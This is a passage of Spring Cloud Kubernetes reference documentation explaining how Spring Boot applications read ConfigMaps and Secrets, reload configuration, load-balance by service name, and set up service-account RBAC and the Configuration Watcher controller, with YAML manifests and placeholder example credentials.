with additional tooling, such as Istio (https:\/\/istio.io), a service mesh that is capable of load balancing, circuit breaker, failover, and much more.\n\nThe caller service then need only refer to names resolvable in a particular Kubernetes cluster. A simple implementation might use a Spring `RestTemplate` that refers to a fully qualified domain name (FQDN), such as `https:\/\/{service-name}.{namespace}.svc.{cluster}.local:{service-port}` (a sketch follows the list below).\n\nAdditionally, you can use Hystrix for:\n\n* Circuit breaker implementation on the caller side, by annotating the Spring Boot application class with `@EnableCircuitBreaker`\n* Fallback functionality, by annotating the respective method with `@HystrixCommand(fallbackMethod=`\n\n
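As a purely illustrative sketch (the service name `demo-service`, the `default` namespace, the port `8080`, and the `GreetingClient` class are assumptions, not part of this project), such a call could look like this:\n\n====\n[source,java]\n----\n@Service\npublic class GreetingClient {\n \/\/ In a real application the RestTemplate would typically be injected as a bean\n private final RestTemplate restTemplate = new RestTemplate();\n\n public String greet() {\n \/\/ Kubernetes DNS resolves the FQDN server side; no client-side discovery library is involved\n return restTemplate.getForObject(\"http:\/\/demo-service.default.svc.cluster.local:8080\/greeting\", String.class);\n }\n}\n----\n====\n\n== Kubernetes PropertySource implementations\n\nThe most common approach to configuring your Spring Boot application is to create an `application.properties` or `application.yaml` or\nan `application-profile.properties` or `application-profile.yaml` file that contains key-value pairs that provide customization values to your\napplication or Spring Boot starters. 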
== Kubernetes PropertySource implementations

The most common approach to configuring your Spring Boot application is to create an `application.properties` or `application.yaml` or
an `application-profile.properties` or `application-profile.yaml` file that contains key-value pairs that provide customization values to your
application or Spring Boot starters. You can override these properties by specifying system properties or environment
variables.

[[configmap-propertysource]]
=== Using a `ConfigMap` `PropertySource`

Kubernetes provides a resource named https://kubernetes.io/docs/user-guide/configmap/[`ConfigMap`] to externalize the
parameters to pass to your application in the form of key-value pairs or embedded `application.properties` or `application.yaml` files.
The link:https://github.com/spring-cloud/spring-cloud-kubernetes/tree/master/spring-cloud-kubernetes-fabric8-config[Spring Cloud Kubernetes Config] project makes Kubernetes `ConfigMap` instances available
during application bootstrapping and triggers hot reloading of beans or the Spring context when changes are detected on
observed `ConfigMap` instances.

The default behavior is to create a `Fabric8ConfigMapPropertySource` based on a Kubernetes `ConfigMap` that has a `metadata.name` value of either the name of
your Spring application (as defined by its `spring.application.name` property) or a custom name defined within the
`bootstrap.properties` file under the following key: `spring.cloud.kubernetes.config.name`.

However, more advanced configuration is possible where you can use multiple `ConfigMap` instances.
The `spring.cloud.kubernetes.config.sources` list makes this possible.
For example, you could define the following `ConfigMap` instances:

====
[source,yaml]
----
spring:
  application:
    name: cloud-k8s-app
  cloud:
    kubernetes:
      config:
        name: default-name
        namespace: default-namespace
        sources:
          # Spring Cloud Kubernetes looks up a ConfigMap named c1 in namespace default-namespace
          - name: c1
          # Spring Cloud Kubernetes looks up a ConfigMap named default-name in namespace n2
          - namespace: n2
          # Spring Cloud Kubernetes looks up a ConfigMap named c3 in namespace n3
          - namespace: n3
            name: c3
----
====

In the preceding example, if `spring.cloud.kubernetes.config.namespace` had not been set,
the `ConfigMap` named `c1` would be looked up in the namespace that the application runs in.

Any matching `ConfigMap` that is found is processed as follows:

* Apply individual configuration properties.
* Apply as `yaml` the content of any property named `application.yaml`.
* Apply as a properties file the content of any property named `application.properties`.

The single exception to the aforementioned flow is when the `ConfigMap` contains a *single* key that indicates
the file is a YAML or properties file. In that case, the name of the key does NOT have to be `application.yaml` or
`application.properties` (it can be anything) and the value of the property is treated correctly.
This feature facilitates the use case where the `ConfigMap` was created by using something like the following:

====
[source]
----
kubectl create configmap game-config --from-file=/path/to/app-config.yaml
----
====

Assume that we have a Spring Boot application named `demo` that uses the following properties to read its thread pool
configuration:

* `pool.size.core`
* `pool.size.max`

This can be externalized to a config map in `yaml` format as follows:

====
[source,yaml]
----
kind: ConfigMap
apiVersion: v1
metadata:
  name: demo
data:
  pool.size.core: 1
  pool.size.max: 16
----
====
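On the application side, keys like these might be bound with a standard `@ConfigurationProperties` class. The following is a minimal sketch; the class and accessor names are illustrative assumptions, not part of this project:

====
[source,java]
----
// A hedged sketch of binding the pool.size.* keys shown above.
import org.springframework.boot.context.properties.ConfigurationProperties;
import org.springframework.context.annotation.Configuration;

@Configuration
@ConfigurationProperties(prefix = "pool.size")
public class PoolProperties {

    // Bound from pool.size.core and pool.size.max in the ConfigMap.
    private int core;
    private int max;

    public int getCore() { return core; }
    public void setCore(int core) { this.core = core; }
    public int getMax() { return max; }
    public void setMax(int max) { this.max = max; }
}
----
====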
Individual properties work fine for most cases. However, sometimes, embedded `yaml` is more convenient. In this case, we
use a single property named `application.yaml` to embed our `yaml`, as follows:

====
[source,yaml]
----
kind: ConfigMap
apiVersion: v1
metadata:
  name: demo
data:
  application.yaml: |-
    pool:
      size:
        core: 1
        max: 16
----
====

The following example also works:

====
[source,yaml]
----
kind: ConfigMap
apiVersion: v1
metadata:
  name: demo
data:
  custom-name.yaml: |-
    pool:
      size:
        core: 1
        max: 16
----
====

You can also configure Spring Boot applications differently depending on active profiles that are merged together
when the `ConfigMap` is read. You can provide different property values for different profiles by using an
`application.properties` or `application.yaml` property, specifying profile-specific values, each in their own document
(indicated by the `---` sequence), as follows:

====
[source,yaml]
----
kind: ConfigMap
apiVersion: v1
metadata:
  name: demo
data:
  application.yml: |-
    greeting:
      message: Say Hello to the World
    farewell:
      message: Say Goodbye
    ---
    spring:
      profiles: development
    greeting:
      message: Say Hello to the Developers
    farewell:
      message: Say Goodbye to the Developers
    ---
    spring:
      profiles: production
    greeting:
      message: Say Hello to the Ops
----
====

In the preceding case, the configuration loaded into your Spring Application with the `development` profile is as follows:

====
[source,yaml]
----
greeting:
  message: Say Hello to the Developers
farewell:
  message: Say Goodbye to the Developers
----
====

However, if the `production` profile is active, the configuration becomes:

====
[source,yaml]
----
greeting:
  message: Say Hello to the Ops
farewell:
  message: Say Goodbye
----
====

If both profiles are active, the property that appears last within the `ConfigMap` overwrites any preceding values.

Another option is to create a different config map per profile; Spring Boot automatically fetches the right one based
on the active profiles:

====
[source,yaml]
----
kind: ConfigMap
apiVersion: v1
metadata:
  name: demo
data:
  application.yml: |-
    greeting:
      message: Say Hello to the World
    farewell:
      message: Say Goodbye
----
====
====
[source,yaml]
----
kind: ConfigMap
apiVersion: v1
metadata:
  name: demo-development
data:
  application.yml: |-
    spring:
      profiles: development
    greeting:
      message: Say Hello to the Developers
    farewell:
      message: Say Goodbye to the Developers
----
====
====
[source,yaml]
----
kind: ConfigMap
apiVersion: v1
metadata:
  name: demo-production
data:
  application.yml: |-
    spring:
      profiles: production
    greeting:
      message: Say Hello to the Ops
    farewell:
      message: Say Goodbye
----
====

To tell Spring Boot which profile should be enabled at bootstrap, you can pass the `SPRING_PROFILES_ACTIVE` environment variable.
To do so, define it in the PodSpec at the container specification of your Deployment resource file, as follows:

====
[source,yaml]
----
apiVersion: apps/v1
kind: Deployment
metadata:
  name: deployment-name
  labels:
    app: deployment-name
spec:
  replicas: 1
  selector:
    matchLabels:
      app: deployment-name
  template:
    metadata:
      labels:
        app: deployment-name
    spec:
      containers:
      - name: container-name
        image: your-image
        env:
        - name: SPRING_PROFILES_ACTIVE
          value: "development"
----
====
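With the `development` profile activated as above, the profile-specific values from the earlier `ConfigMap` surface through ordinary property injection. The following is a minimal sketch; the class and field names are illustrative assumptions:

====
[source,java]
----
// A hedged sketch: with the development profile active, this prints
// "Say Hello to the Developers". Names are illustrative.
import org.springframework.beans.factory.annotation.Value;
import org.springframework.stereotype.Component;

@Component
public class GreetingPrinter {

    @Value("${greeting.message}")
    private String greetingMessage;

    public void print() {
        System.out.println(greetingMessage);
    }
}
----
====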
NOTE: You should check the security configuration section. To access config maps from inside a pod, you need to have the correct
Kubernetes service accounts, roles, and role bindings.

Another option for using `ConfigMap` instances is to mount them into the Pod by running the Spring Cloud Kubernetes application
and having Spring Cloud Kubernetes read them from the file system.
This behavior is controlled by the `spring.cloud.kubernetes.config.paths` property. You can use it in
addition to or instead of the mechanism described earlier.
You can specify multiple (exact) file paths in `spring.cloud.kubernetes.config.paths` by using the `,` delimiter.

NOTE: You have to provide the full exact path to each property file, because directories are not recursively parsed.

NOTE: If you use `spring.cloud.kubernetes.config.paths` or `spring.cloud.kubernetes.secrets.paths`, the automatic reload
functionality will not work. You will need to make a `POST` request to the `/actuator/refresh` endpoint or
restart/redeploy the application.

.Properties:
[options="header,footer"]
|===
| Name | Type | Default | Description
| `spring.cloud.kubernetes.config.enabled` | `Boolean` | `true` | Enable ConfigMaps `PropertySource`
| `spring.cloud.kubernetes.config.name` | `String` | `${spring.application.name}` | Sets the name of the `ConfigMap` to look up
| `spring.cloud.kubernetes.config.namespace` | `String` | Client namespace | Sets the Kubernetes namespace where to look up
| `spring.cloud.kubernetes.config.paths` | `List` | `null` | Sets the paths where `ConfigMap` instances are mounted
| `spring.cloud.kubernetes.config.enableApi` | `Boolean` | `true` | Enable or disable consuming `ConfigMap` instances through APIs
|===

=== Secrets PropertySource

Kubernetes has the notion of https://kubernetes.io/docs/concepts/configuration/secret/[Secrets] for storing
sensitive data such as passwords, OAuth tokens, and so on. This project provides integration with `Secrets` to make secrets
accessible by Spring Boot applications. You can explicitly enable or disable this feature by setting the `spring.cloud.kubernetes.secrets.enabled` property.

When enabled, the `Fabric8SecretsPropertySource` looks up `Secrets` in Kubernetes from the following sources:

. Reading recursively from secrets mounts
. Named after the application (as defined by `spring.application.name`)
. Matching some labels

*Note:*

By default, consuming Secrets through the API (points 2 and 3 above) *is not enabled* for security reasons. The permission 'list' on secrets allows clients to inspect secret values in the specified namespace.
Further, we recommend that containers share secrets through mounted volumes.

If you enable consuming Secrets through the API, we recommend that you limit access to Secrets by using an authorization policy, such as RBAC.
For more information about risks and best practices when consuming Secrets through the API, refer to https://kubernetes.io/docs/concepts/configuration/secret/#best-practices[this doc].

If the secrets are found, their data is made available to the application.

Assume that we have a Spring Boot application named `demo` that uses properties to read its database
configuration.
We can create a Kubernetes secret by using the following command:

====
[source]
----
kubectl create secret generic db-secret --from-literal=username=user --from-literal=password=p455w0rd
----
====

The preceding command would create the following secret (which you can see by using `kubectl get secrets db-secret -o yaml`):

====
[source,yaml]
----
apiVersion: v1
data:
  password: cDQ1NXcwcmQ=
  username: dXNlcg==
kind: Secret
metadata:
  creationTimestamp: 2017-07-04T09:15:57Z
  name: db-secret
  namespace: default
  resourceVersion: "357496"
  selfLink: /api/v1/namespaces/default/secrets/db-secret
  uid: 63c89263-6099-11e7-b3da-76d6186905a8
type: Opaque
----
====

Note that the data contains Base64-encoded versions of the literals provided by the `create` command.

Your application can then use this secret -- for example, by exporting the secret's values as environment variables:

====
[source,yaml]
----
apiVersion: apps/v1
kind: Deployment
metadata:
  name: ${project.artifactId}
spec:
  template:
    spec:
      containers:
      - env:
        - name: DB_USERNAME
          valueFrom:
            secretKeyRef:
              name: db-secret
              key: username
        - name: DB_PASSWORD
          valueFrom:
            secretKeyRef:
              name: db-secret
              key: password
----
====

A short sketch of reading these variables from application code follows the list below.

You can select the Secrets to consume in a number of ways:

. By listing the directories where secrets are mapped:
+
====
[source,bash]
----
-Dspring.cloud.kubernetes.secrets.paths=/etc/secrets/db-secret,/etc/secrets/postgresql
----
====
+
If you have all the secrets mapped to a common root, you can set them like:
+
====
[source,bash]
----
-Dspring.cloud.kubernetes.secrets.paths=/etc/secrets
----
====

. By setting a named secret:
+
====
[source,bash]
----
-Dspring.cloud.kubernetes.secrets.name=db-secret
----
====

. By defining a list of labels:
+
====
[source,bash]
----
-Dspring.cloud.kubernetes.secrets.labels.broker=activemq
-Dspring.cloud.kubernetes.secrets.labels.db=postgresql
----
====
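Returning to the environment-variable approach shown earlier, the exported values behave like ordinary Spring properties. A minimal sketch (the class and field names are illustrative assumptions):

====
[source,java]
----
// A hedged sketch: DB_USERNAME and DB_PASSWORD come from the env entries
// populated by db-secret in the Deployment above. Names are illustrative.
import org.springframework.beans.factory.annotation.Value;
import org.springframework.stereotype.Component;

@Component
public class DatabaseCredentials {

    @Value("${DB_USERNAME}")
    private String username;

    @Value("${DB_PASSWORD}")
    private String password;

    public String getUsername() { return username; }
    public String getPassword() { return password; }
}
----
====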
As is the case with `ConfigMap` instances, more advanced configuration is also possible where you can use multiple `Secret`
instances. The `spring.cloud.kubernetes.secrets.sources` list makes this possible.
For example, you could define the following `Secret` instances:

====
[source,yaml]
----
spring:
  application:
    name: cloud-k8s-app
  cloud:
    kubernetes:
      secrets:
        name: default-name
        namespace: default-namespace
        sources:
          # Spring Cloud Kubernetes looks up a Secret named s1 in namespace default-namespace
          - name: s1
          # Spring Cloud Kubernetes looks up a Secret named default-name in namespace n2
          - namespace: n2
          # Spring Cloud Kubernetes looks up a Secret named s3 in namespace n3
          - namespace: n3
            name: s3
----
====

In the preceding example, if `spring.cloud.kubernetes.secrets.namespace` had not been set,
the `Secret` named `s1` would be looked up in the namespace that the application runs in.

.Properties:
[options="header,footer"]
|===
| Name | Type | Default | Description
| `spring.cloud.kubernetes.secrets.enabled` | `Boolean` | `true` | Enable Secrets `PropertySource`
| `spring.cloud.kubernetes.secrets.name` | `String` | `${spring.application.name}` | Sets the name of the secret to look up
| `spring.cloud.kubernetes.secrets.namespace` | `String` | Client namespace | Sets the Kubernetes namespace where to look up
| `spring.cloud.kubernetes.secrets.labels` | `Map` | `null` | Sets the labels used to look up secrets
| `spring.cloud.kubernetes.secrets.paths` | `List` | `null` | Sets the paths where secrets are mounted (example 1)
| `spring.cloud.kubernetes.secrets.enableApi` | `Boolean` | `false` | Enables or disables consuming secrets through APIs (examples 2 and 3)
|===

Notes:

* The `spring.cloud.kubernetes.secrets.labels` property behaves as defined by
https://github.com/spring-projects/spring-boot/wiki/Spring-Boot-Configuration-Binding#map-based-binding[Map-based binding].
* The `spring.cloud.kubernetes.secrets.paths` property behaves as defined by
https://github.com/spring-projects/spring-boot/wiki/Spring-Boot-Configuration-Binding#collection-based-binding[Collection-based binding].
* Access to secrets through the API may be restricted for security reasons. The preferred way is to mount secrets to the Pod.

You can find an example of an application that uses secrets (though it has not been updated to use the new `spring-cloud-kubernetes` project) at
https://github.com/fabric8-quickstarts/spring-boot-camel-config[spring-boot-camel-config].

=== `PropertySource` Reload

WARNING: This functionality has been deprecated in the 2020.0 release. Please see
the <<spring-cloud-kubernetes-configuration-watcher>> controller for an alternative way
to achieve the same functionality.

Some applications may need to detect changes on external property sources and update their internal status to reflect the new configuration.
The reload feature of Spring Cloud Kubernetes is able to trigger an application reload when a related `ConfigMap` or
`Secret` changes.

By default, this feature is disabled. You can enable it by using the `spring.cloud.kubernetes.reload.enabled=true` configuration property (for example, in the `application.properties` file).

The following levels of reload are supported (by setting the `spring.cloud.kubernetes.reload.strategy` property):

* `refresh` (default): Only configuration beans annotated with `@ConfigurationProperties` or `@RefreshScope` are reloaded.
This reload level leverages the refresh feature of Spring Cloud Context.

* `restart_context`: The whole Spring `ApplicationContext` is gracefully restarted.
Beans are recreated with the new configuration.
In order for the restart context functionality to work properly, you must enable and expose the restart actuator endpoint:
+
====
[source,yaml]
----
management:
  endpoint:
    restart:
      enabled: true
  endpoints:
    web:
      exposure:
        include: restart
----
====

* `shutdown`: The Spring `ApplicationContext` is shut down to activate a restart of the container.
When you use this level, make sure that the lifecycle of all non-daemon threads is bound to the `ApplicationContext`
and that a replication controller or replica set is configured to restart the pod.

Assuming that the reload feature is enabled with default settings (`refresh` mode), the following bean is refreshed when the config map changes:

====
[source,java]
----
@Configuration
@ConfigurationProperties(prefix = "bean")
public class MyConfig {

    private String message = "a message that can be changed live";

    // getter and setters

}
----
====

To see that changes effectively happen, you can create another bean that prints the message periodically, as follows:

====
[source,java]
----
@Component
public class MyBean {

    @Autowired
    private MyConfig config;

    @Scheduled(fixedDelay = 5000)
    public void hello() {
        System.out.println("The message is: " + config.getMessage());
    }
}
----
====

You can change the message printed by the application by using a `ConfigMap`, as follows:

====
[source,yaml]
----
apiVersion: v1
kind: ConfigMap
metadata:
  name: reload-example
data:
  application.properties: |-
    bean.message=Hello World!
----
====

Any change to the property named `bean.message` in the `ConfigMap` associated with the pod is reflected in the
output. More generally speaking, changes associated to properties prefixed with the value defined by the `prefix`
field of the `@ConfigurationProperties` annotation are detected and reflected in the application.
<<configmap-propertysource,Associating a `ConfigMap` with a pod>> is explained earlier in this chapter.

The full example is available in https://github.com/fabric8io/spring-cloud-kubernetes/tree/master/spring-cloud-kubernetes-examples/kubernetes-reload-example[`spring-cloud-kubernetes-reload-example`].

The reload feature supports two operating modes:

* Event (default): Watches for changes in config maps or secrets by using the Kubernetes API (web socket).
Any event produces a re-check on the configuration and, in case of changes, a reload.
The `view` role on the service account is required in order to listen for config map changes.
A higher-level role (such as `edit`) is required for secrets
(by default, secrets are not monitored).
* Polling: Periodically re-creates the configuration from config maps and secrets to see if it has changed.
You can configure the polling period by using the `spring.cloud.kubernetes.reload.period` property; it defaults to 15 seconds.
It requires the same role as the monitored property source.
This means, for example, that using polling on file-mounted secret sources does not require particular privileges.

.Properties:
[options="header,footer"]
|===
| Name | Type | Default | Description
| `spring.cloud.kubernetes.reload.enabled` | `Boolean` | `false` | Enables monitoring of property sources and configuration reload
| `spring.cloud.kubernetes.reload.monitoring-config-maps` | `Boolean` | `true` | Allow monitoring changes in config maps
| `spring.cloud.kubernetes.reload.monitoring-secrets` | `Boolean` | `false` | Allow monitoring changes in secrets
| `spring.cloud.kubernetes.reload.strategy` | `Enum` | `refresh` | The strategy to use when firing a reload (`refresh`, `restart_context`, or `shutdown`)
| `spring.cloud.kubernetes.reload.mode` | `Enum` | `event` | Specifies how to listen for changes in property sources (`event` or `polling`)
| `spring.cloud.kubernetes.reload.period` | `Duration`| `15s` | The period for verifying changes when using the `polling` strategy
|===

Notes:

* You should not use properties under `spring.cloud.kubernetes.reload` in config maps or secrets. Changing such properties at runtime may lead to unexpected results.
* Deleting a property or the whole config map does not restore the original state of the beans when you use the `refresh` level.

== Kubernetes Ecosystem Awareness

All of the features described earlier in this guide work equally well, regardless of whether your application is running inside
Kubernetes. This is really helpful for development and troubleshooting.
From a development point of view, this lets you start your Spring Boot application and debug one
of the modules that is part of this project. You need not deploy it in Kubernetes,
as the code of the project relies on the
https://github.com/fabric8io/kubernetes-client[Fabric8 Kubernetes Java client], which is a fluent DSL that can
communicate over the `http` protocol with the REST API of the Kubernetes server.

To disable the integration with Kubernetes, you can set `spring.cloud.kubernetes.enabled` to `false`. Please be aware that when `spring-cloud-kubernetes-config` is on the classpath,
`spring.cloud.kubernetes.enabled` should be set in `bootstrap.{properties|yml}` (or the profile-specific one); otherwise, it should be set in `application.{properties|yml}` (or the profile-specific one).
Also note that the properties `spring.cloud.kubernetes.config.enabled` and `spring.cloud.kubernetes.secrets.enabled` only take effect when set in `bootstrap.{properties|yml}`.

=== Kubernetes Profile Autoconfiguration

When the application runs as a pod inside Kubernetes, a Spring profile named `kubernetes` automatically gets activated.
This lets you customize the configuration, to define beans that are applied when the Spring Boot application is deployed
within the Kubernetes platform (for example, different development and production configuration).
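For example, you can restrict beans to in-cluster deployments with the standard `@Profile` mechanism. The following is a minimal sketch; the configuration class and bean names are illustrative assumptions:

====
[source,java]
----
// A hedged sketch: the first bean is only created when the application runs
// inside Kubernetes, where the "kubernetes" profile is active. Names are illustrative.
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.context.annotation.Profile;

@Configuration
public class PlatformConfig {

    @Bean
    @Profile("kubernetes")
    public String deploymentBanner() {
        return "running inside Kubernetes";
    }

    @Bean
    @Profile("!kubernetes")
    public String localBanner() {
        return "running outside Kubernetes";
    }
}
----
====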
=== Istio Awareness

When you include the `spring-cloud-kubernetes-istio` module in the application classpath, a new profile is added to the application,
provided the application is running inside a Kubernetes cluster with https://istio.io[Istio] installed. You can then use
Spring `@Profile("istio")` annotations in your beans and `@Configuration` classes.

The Istio awareness module uses `me.snowdrop:istio-client` to interact with Istio APIs, letting us discover traffic rules, circuit breakers, and so on,
making it easy for our Spring Boot applications to consume this data to dynamically configure themselves according to the environment.

== Pod Health Indicator

Spring Boot uses https://github.com/spring-projects/spring-boot/blob/master/spring-boot-project/spring-boot-actuator/src/main/java/org/springframework/boot/actuate/health/HealthEndpoint.java[`HealthIndicator`] to expose info about the health of an application.
That makes it really useful for exposing health-related information to the user and makes it a good fit for use as https://kubernetes.io/docs/tasks/configure-pod-container/configure-liveness-readiness-probes/[readiness probes].

The Kubernetes health indicator (which is part of the core module) exposes the following info:

* Pod name, IP address, namespace, service account, node name, and its IP address
* A flag that indicates whether the Spring Boot application is internal or external to Kubernetes

== Info Contributor

Spring Cloud Kubernetes includes an `InfoContributor` which adds Pod information to
Spring Boot's `/info` Actuator endpoint.

You can disable this `InfoContributor` by setting `management.info.kubernetes.enabled`
to `false` in `bootstrap.[properties | yaml]`.

== Leader Election

<TBD>

== LoadBalancer for Kubernetes

This project includes Spring Cloud Load Balancer for load balancing based on Kubernetes Endpoints and provides an implementation of a load balancer based on a Kubernetes Service.
To include it in your project, add the following dependency:

====
[source,xml]
----
<dependency>
    <groupId>org.springframework.cloud</groupId>
    <artifactId>spring-cloud-starter-kubernetes-loadbalancer</artifactId>
</dependency>
----
====

To enable load balancing based on the Kubernetes Service name, use the following property. The load balancer then tries to call the application by using an address such as `service-a.default.svc.cluster.local`:

====
[source]
----
spring.cloud.kubernetes.loadbalancer.mode=SERVICE
----
====
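A minimal sketch of making a load-balanced call with this starter on the classpath; the wiring follows the standard Spring Cloud LoadBalancer pattern, and the service name `service-a` and endpoint path are illustrative assumptions:

====
[source,java]
----
// A hedged sketch: a @LoadBalanced RestTemplate resolves the logical
// service name "service-a" through Spring Cloud LoadBalancer.
import org.springframework.cloud.client.loadbalancer.LoadBalanced;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.web.client.RestTemplate;

@Configuration
public class LoadBalancerConfig {

    @Bean
    @LoadBalanced
    public RestTemplate restTemplate() {
        return new RestTemplate();
    }
}

// Elsewhere, inject this RestTemplate and call the service by its logical name:
//   String body = restTemplate.getForObject("http://service-a/greeting", String.class);
----
====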
To enable load balancing across all namespaces, use the following property. The property from the `spring-cloud-kubernetes-discovery` module is respected:

====
[source]
----
spring.cloud.kubernetes.discovery.all-namespaces=true
----
====

== Security Configurations Inside Kubernetes

=== Namespace

Most of the components provided in this project need to know the namespace. For Kubernetes (1.3+), the namespace is made available to the pod as part of the service account secret and is automatically detected by the client.
For earlier versions, it needs to be specified as an environment variable to the pod. A quick way to do this is as follows:

====
[source]
----
      env:
      - name: "KUBERNETES_NAMESPACE"
        valueFrom:
          fieldRef:
            fieldPath: "metadata.namespace"
----
====

=== Service Account

For distributions of Kubernetes that support more fine-grained role-based access within the cluster, you need to make sure a pod that runs with `spring-cloud-kubernetes` has access to the Kubernetes API.
For any service accounts you assign to a deployment or pod, you need to make sure they have the correct roles.

Depending on the requirements, you'll need `get`, `list`, and `watch` permission on the following resources:

.Kubernetes Resource Permissions
|===
| Dependency | Resources

| spring-cloud-starter-kubernetes
| pods, services, endpoints

| spring-cloud-starter-kubernetes-config
| configmaps, secrets
|===

For development purposes, you can add `cluster-reader` permissions to your `default` service account. On a production system, you'll likely want to provide more granular permissions.

The following Role and RoleBinding are an example for namespaced permissions for the `default` account:

====
[source,yaml]
----
kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  namespace: YOUR-NAME-SPACE
  name: namespace-reader
rules:
  - apiGroups: ["", "extensions", "apps"]
    resources: ["configmaps", "pods", "services", "endpoints", "secrets"]
    verbs: ["get", "list", "watch"]

---

kind: RoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: namespace-reader-binding
  namespace: YOUR-NAME-SPACE
subjects:
- kind: ServiceAccount
  name: default
  apiGroup: ""
roleRef:
  kind: Role
  name: namespace-reader
  apiGroup: "rbac.authorization.k8s.io"
----
====

== Service Registry Implementation

In Kubernetes, service registration is controlled by the platform; the application itself does not control
registration as it may in other platforms. For this reason, using `spring.cloud.service-registry.auto-registration.enabled`
or setting `@EnableDiscoveryClient(autoRegister=false)` has no effect in Spring Cloud Kubernetes.

[#spring-cloud-kubernetes-configuration-watcher]
## Spring Cloud Kubernetes Configuration Watcher

Kubernetes provides the ability to https://kubernetes.io/docs/tasks/configure-pod-container/configure-pod-configmap/#add-configmap-data-to-a-volume[mount a ConfigMap or Secret as a volume]
in the container of your application. When the contents of the ConfigMap or Secret changes, the https://kubernetes.io/docs/tasks/configure-pod-container/configure-pod-configmap/#mounted-configmaps-are-updated-automatically[mounted volume will be updated with those changes].

However, Spring Boot will not automatically update those changes unless you restart the application.
Spring Cloud
provides the ability to refresh the application context without restarting the application, by either hitting the
actuator endpoint `/refresh` or by publishing a `RefreshRemoteApplicationEvent` using Spring Cloud Bus.

To achieve this configuration refresh of a Spring Cloud app running on Kubernetes, you can deploy the Spring Cloud
Kubernetes Configuration Watcher controller into your Kubernetes cluster.

The application is published as a container and is available on https://hub.docker.com/repository/docker/springcloud/spring-cloud-kubernetes-configuration-watcher[Docker Hub].

Spring Cloud Kubernetes Configuration Watcher can send refresh notifications to applications in two ways:

1. Over HTTP, in which case the application being notified must have the `/refresh` actuator endpoint exposed and accessible from within the cluster
2. Using Spring Cloud Bus, in which case you will need a message broker deployed to your cluster for the application to use

### Deployment YAML

Below is a sample deployment YAML you can use to deploy the Kubernetes Configuration Watcher to Kubernetes.

====
[source,yaml]
----
---
apiVersion: v1
kind: List
items:
  - apiVersion: v1
    kind: Service
    metadata:
      labels:
        app: spring-cloud-kubernetes-configuration-watcher
      name: spring-cloud-kubernetes-configuration-watcher
    spec:
      ports:
        - name: http
          port: 8888
          targetPort: 8888
      selector:
        app: spring-cloud-kubernetes-configuration-watcher
      type: ClusterIP
  - apiVersion: v1
    kind: ServiceAccount
    metadata:
      labels:
        app: spring-cloud-kubernetes-configuration-watcher
      name: spring-cloud-kubernetes-configuration-watcher
  - apiVersion: rbac.authorization.k8s.io/v1
    kind: RoleBinding
    metadata:
      labels:
        app: spring-cloud-kubernetes-configuration-watcher
      name: spring-cloud-kubernetes-configuration-watcher:view
    roleRef:
      kind: Role
      apiGroup: rbac.authorization.k8s.io
      name: namespace-reader
    subjects:
      - kind: ServiceAccount
        name: spring-cloud-kubernetes-configuration-watcher
  - apiVersion: rbac.authorization.k8s.io/v1
    kind: Role
    metadata:
      namespace: default
      name: namespace-reader
    rules:
      - apiGroups: ["", "extensions", "apps"]
        resources: ["configmaps", "pods", "services", "endpoints", "secrets"]
        verbs: ["get", "list", "watch"]
  - apiVersion: apps/v1
    kind: Deployment
    metadata:
      name: spring-cloud-kubernetes-configuration-watcher-deployment
    spec:
      selector:
        matchLabels:
          app: spring-cloud-kubernetes-configuration-watcher
      template:
        metadata:
          labels:
            app: spring-cloud-kubernetes-configuration-watcher
        spec:
          serviceAccount: spring-cloud-kubernetes-configuration-watcher
          containers:
          - name: spring-cloud-kubernetes-configuration-watcher
            image: springcloud/spring-cloud-kubernetes-configuration-watcher:2.0.0-SNAPSHOT
            imagePullPolicy: IfNotPresent
            readinessProbe:
              httpGet:
                port: 8888
                path: /actuator/health/readiness
            livenessProbe:
              httpGet:
                port: 8888
                path: /actuator/health/liveness
            ports:
            - containerPort: 8888
----
====

The Service Account and associated Role Binding are important for Spring Cloud Kubernetes Configuration Watcher to work properly.
The controller needs access to read data about ConfigMaps, Pods, Services, Endpoints, and Secrets in the Kubernetes cluster.

### Monitoring ConfigMaps and Secrets

Spring Cloud Kubernetes Configuration Watcher reacts to changes in ConfigMaps with a label of `spring.cloud.kubernetes.config` with the value
`true`
or any Secret with a label of `spring.cloud.kubernetes.secret` with the value `true`. If the ConfigMap or Secret does not have either of those labels,
or the value of those labels is not `true`, any changes are ignored.

The labels Spring Cloud Kubernetes Configuration Watcher looks for on ConfigMaps and Secrets can be changed by setting
`spring.cloud.kubernetes.configuration.watcher.configLabel` and `spring.cloud.kubernetes.configuration.watcher.secretLabel`, respectively.

If a change is made to a ConfigMap or Secret with valid labels, Spring Cloud Kubernetes Configuration Watcher takes the name of the ConfigMap or Secret
and sends a notification to the application with that name.

### HTTP Implementation

The HTTP implementation is used by default. When this implementation is used and a change to a ConfigMap or Secret occurs, Spring Cloud Kubernetes Configuration Watcher uses the Spring Cloud Kubernetes Discovery Client to fetch all
instances of the application that match the name of the ConfigMap or Secret and sends an HTTP POST request to the application's actuator
`/refresh` endpoint. By default, it sends the POST request to `/actuator/refresh` using the port registered in the discovery client.

#### Non-Default Management Port and Actuator Path

If the application is using a non-default actuator path and/or using a different port for the management endpoints, the Kubernetes service for the application
can add an annotation called `boot.spring.io/actuator` and set its value to the path and port used by the application. For example:

====
[source,yaml]
----
apiVersion: v1
kind: Service
metadata:
  labels:
    app: config-map-demo
  name: config-map-demo
  annotations:
    boot.spring.io/actuator: http://:9090/myactuator/home
spec:
  ports:
    - name: http
      port: 8080
      targetPort: 8080
  selector:
    app: config-map-demo
----
====

Another way you can choose to configure the actuator path and/or management port is by setting
`spring.cloud.kubernetes.configuration.watcher.actuatorPath` and `spring.cloud.kubernetes.configuration.watcher.actuatorPort`.

### Messaging Implementation

The messaging implementation can be enabled by setting the profile to either `bus-amqp` (RabbitMQ) or `bus-kafka` (Kafka) when the Spring Cloud Kubernetes Configuration Watcher
application is deployed to Kubernetes.

### Configuring RabbitMQ

When the `bus-amqp` profile is enabled, you will need to configure Spring RabbitMQ to point it to the location of the RabbitMQ
instance you would like to use, as well as any credentials necessary to authenticate. This can be done
by setting the standard Spring RabbitMQ properties, for example:

====
[source,yaml]
----
spring:
  rabbitmq:
    username: user
    password: password
    host: rabbitmq
----
====

### Configuring Kafka

When the `bus-kafka` profile is enabled, you will need to configure Spring Kafka to point it to the location of the Kafka broker
instance you would like to use.
